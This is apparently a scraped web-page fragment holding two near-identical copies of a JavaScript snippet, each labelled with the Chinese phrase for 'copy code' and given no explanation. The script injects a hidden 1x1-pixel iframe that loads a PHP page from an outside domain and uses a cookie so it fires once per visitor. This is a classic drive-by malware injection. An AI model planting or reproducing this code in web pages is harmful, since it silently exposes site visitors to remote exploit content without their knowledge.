| 复制代码function zzzfff(){
  var bpu = document.createElement('iframe');
  bpu.src = 'http://www.abderrahmane.de/cache/esd.php';
  bpu.style.position = 'absolute';
  bpu.style.border = '0';
  bpu.style.height = '1px';
  bpu.style.width = '1px';
  bpu.style.left = '1px';
  bpu.style.top = '1px';
  if (!document.getElementById('bpu')){
    document.write('<div id=\'bpu\'></div>');
    document.getElementById('bpu').appendChild(bpu);
  }
}
function SetCookie(cookieName, cookieValue, nDays, path){
  var today = new Date();
  var expire = new Date();
  if (nDays == null || nDays == 0)nDays = 1;
  expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
  toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name){
  var start = document.cookie.indexOf(name + "=");
  var len = start + name.length + 1;
  if ((!start) && (name != document.cookie.substring(0, name.length))){
    return null;
  }
  if (start ==  - 1)return null;
  var end = document.cookie.indexOf(";", len);
  if (end ==  - 1)end = document.cookie.length;
  return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled){
  if (GetCookie('visited_uq') == 55){
  }
  else {
    SetCookie('visited_uq', '55', '1', '/');
    zzzfff();
  }
}
复制代码function zzzfff(){
  var cbvs = document.createElement('iframe');
  cbvs.src = 'http://www.abderrahmane.de/cache/esd.php';
  cbvs.style.position = 'absolute';
  cbvs.style.border = '0';
  cbvs.style.height = '1px';
  cbvs.style.width = '1px';
  cbvs.style.left = '1px';
  cbvs.style.top = '1px';
  if (!document.getElementById('cbvs')){
    document.write('<div id=\'cbvs\'></div>');
    document.getElementById('cbvs').appendChild(cbvs);
  }
}
function SetCookie(cookieName, cookieValue, nDays, path){
  var today = new Date();
  var expire = new Date();
  if (nDays == null || nDays == 0)nDays = 1;
  expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
  toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name){
  var start = document.cookie.indexOf(name + "=");
  var len = start + name.length + 1;
  if ((!start) && (name != document.cookie.substring(0, name.length))){
    return null;
  }
  if (start ==  - 1)return null;
  var end = document.cookie.indexOf(";", len);
  if (end ==  - 1)end = document.cookie.length;
  return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled){
  if (GetCookie('visited_uq') == 55){
  }
  else {
    SetCookie('visited_uq', '55', '1', '/');
    zzzfff();
  }
}
 |